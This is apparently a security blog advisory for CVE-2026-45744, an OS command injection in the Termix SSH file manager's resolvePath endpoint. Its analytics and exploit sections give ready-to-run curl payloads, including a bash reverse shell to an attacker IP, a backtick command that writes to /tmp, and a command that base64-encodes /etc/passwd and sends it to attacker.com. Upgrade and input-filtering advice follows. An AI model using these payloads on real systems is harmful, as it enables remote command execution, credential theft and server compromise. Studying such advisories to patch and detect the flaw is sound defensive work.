Listen to this Post
Intro
CVE-2026-45744 is an OS command injection vulnerability discovered in Termix, a web‑based server management platform that provides SSH terminal, tunneling, and file editing capabilities. The flaw resides in the `GET /ssh/file_manager/ssh/resolvePath` endpoint. When handling a request, the backend constructs a shell command to resolve a file path on the connected remote host. The developers attempted to prevent injection by escaping double‑quote characters (") inside user‑supplied input. However, this mitigation is insufficient because it does not block command substitution syntax, specifically `$(…)` and backticks `...` . An authenticated attacker who has an active File Manager SSH session can inject arbitrary system commands through the path parameter. For example, injecting `$(id)` or `id` inside the path causes the shell to execute `id` and substitute its output into the command line. Because the endpoint runs on the remote host (the server that Termix connects to via SSH), the attacker gains command execution on that remote machine, not on the Termix platform itself. The attack requires authentication (any valid user) and an ongoing File Manager session, but no further privileges. Termix versions prior to 2.3.2 are affected. Version 2.3.2 patches the issue by switching to safe API calls that avoid shell string concatenation entirely.
DailyCVE Form
Platform: Termix
Version: <2.3.2
Vulnerability: OS command injection
Severity: Critical
date: 2026-06-05
Prediction: Patch 2026-06-05
Analytics – What Undercode Say
Identify vulnerable endpoint curl -X GET "https://target.com/ssh/file_manager/ssh/resolvePath?path=test" \ -H "Cookie: session=authenticated_cookie" Basic command injection test (sleep 5) curl -X GET "https://target.com/ssh/file_manager/ssh/resolvePath?path=$(sleep 5)" \ -H "Cookie: session=authenticated_cookie" Reverse shell payload (Linux) curl -X GET "https://target.com/ssh/file_manager/ssh/resolvePath?path=$(bash -i >& /dev/tcp/attacker-ip/4444 0>&1)" \ -H "Cookie: session=authenticated_cookie" Using backticks (alternative) curl -X GET "https://target.com/ssh/file_manager/ssh/resolvePath?path=`id > /tmp/pwned`" \ -H "Cookie: session=authenticated_cookie"
Exploit
- Authenticate to Termix and start any File Manager SSH session.
- Capture the session cookie or reuse the active session token.
- Send a GET request to `/ssh/file_manager/ssh/resolvePath` with the `path` parameter containing `$(malicious_command)` or
`malicious_command`. - Example: `path=$(curl http://attacker.com/steal?data=$(cat /etc/passwd | base64))`
5. The remote host executes the command with the same privileges as the SSH user.
Protection
- Upgrade to Termix version 2.3.2 or later.
- If patching is not immediate, disable the File Manager feature or restrict access to trusted users only.
- Implement a Web Application Firewall (WAF) rule to block `$(` and backticks in the `path` parameter.
- Apply input validation – allow only alphanumeric, dots, and forward slashes; reject any special shell metacharacters.
Impact
Successful exploitation allows an authenticated attacker to execute arbitrary operating system commands on any remote host that the victim has an active File Manager SSH session connected to. The attacker can read, modify, or delete files; install malware; pivot to internal networks; steal SSH keys; or completely compromise the remote server. Because the injected commands run under the SSH user’s privileges, lateral movement is possible if that user has elevated access or passwordless sudo rules. Confidentiality, integrity, and availability of the remote host are all lost.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
